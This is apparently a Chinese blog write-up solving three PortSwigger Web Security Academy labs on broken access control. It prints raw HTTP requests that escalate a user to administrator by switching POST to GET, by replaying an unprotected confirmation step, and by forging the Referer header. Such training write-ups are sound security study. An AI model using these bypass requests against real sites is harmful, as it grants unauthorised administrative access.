Burp Web Academy 访问控制漏洞(三)

发表于 更新于 分类于

0x01. PortSwigger Web Security Academy

PortSwigger Web Security Academy 是 Burp Suite 官方推出的免费 Web 安全学习靶场,在学习 Web 安全知识的同时,还可以练习 Burp Suite 的实战技能。

本篇文章讲解 Web Security Academy 之中的访问控制漏洞(Access Control Vulnerabilities)章节。

0x02. 访问控制漏洞

2.1 Lab: Method-based access control can be circumvented

This lab implements access controls based partly on the HTTP method of requests. You can familiarize yourself with the admin panel by logging in using the credentials administrator:admin.

To solve the lab, log in using the credentials wiener:peter and exploit the flawed access controls to promote yourself to become an administrator.

先使用 administrator 登录,发现有一个用户管理页面,可以对用户的级别进行调整(升级为管理员、降级为普通用户),先测试抓包。

然后,使用 wiener 登录,并尝试对自身进行升级操作(注意把 Cookie 设置为 wiener 的值):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
POST /admin-roles HTTP/2
Host: 0a0100490482d648802485f7005300ae.web-security-academy.net
Cookie: session=VEpavD1XF1FS0n9gElQY2aEkJeFgiIAW
Content-Length: 30
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://0a0100490482d648802485f7005300ae.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a0100490482d648802485f7005300ae.web-security-academy.net/admin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

username=wiener&action=upgrade

提示 Unauthorized

1
2
3
4
5
6
HTTP/2 401 Unauthorized
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 14

"Unauthorized"

根据题目提示,改成 GET 请求,成功提升至管理员权限:

1
GET /admin-roles?username=wiener&action=upgrade HTTP/2

看来同时支持 GETPOST,但是仅仅对 POST 做了鉴权操作。

2.2 Lab: Multi-step process with no access control on one step

This lab has an admin panel with a flawed multi-step process for changing a user’s role. You can familiarize yourself with the admin panel by logging in using the credentials administrator:admin.

To solve the lab, log in using the credentials wiener:peter and exploit the flawed access controls to promote yourself to become an administrator.

先使用 administrator 登录,发现有一个用户管理页面,可以对用户的级别进行调整(升级为管理员、降级为普通用户),但是有二次确认,抓包对比。

第一步,升级用户:

1
2
3
4
5
POST /admin-roles HTTP/2
Host: 0a4c003f04db44998092c738003000e6.web-security-academy.net
......

username=wiener&action=upgrade

会提示是否确认升级操作,可以返回,也可以确认。如果确认,也会触发 POST 请求:

1
2
3
4
5
POST /admin-roles HTTP/2
Host: 0a4c003f04db44998092c738003000e6.web-security-academy.net
......

action=upgrade&confirmed=true&username=wiener

同样的 URL,只不过多了一个参数 confirmed=true。直接使用 wiener 登录,替换 Cookie 后发送上述请求,即可提升至管理员权限。

2.3 Lab: Referer-based access control

This lab controls access to certain admin functionality based on the Referer header. You can familiarize yourself with the admin panel by logging in using the credentials administrator:admin.

To solve the lab, log in using the credentials wiener:peter and exploit the flawed access controls to promote yourself to become an administrator.

不要太简单,抓取 administrator 的数据包,使用 wiener 登录,替换 Cookie 后发送上述请求,即可提升至管理员权限。

当然,题目描述是使用了 Referer 鉴权,这个是很简单也很经典的问题,比如有些网站会禁止盗链图片,就是通过 Referer 来完成的。

如果删掉 Referer,就会返回未授权:

1
2
3
4
5
6
HTTP/2 401 Unauthorized
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 14

"Unauthorized"

0x03. 小结

  • 尝试使用不同的请求方法,GETPOST 等,看是否存在鉴权漏洞
  • 观察不同操作对应的 HTTP 请求,看看参数有无区别
  • 绕过基于 Referer 的鉴权

0x04. 参考文档

  1. https://portswigger.net/web-security/all-labs#access-control-vulnerabilities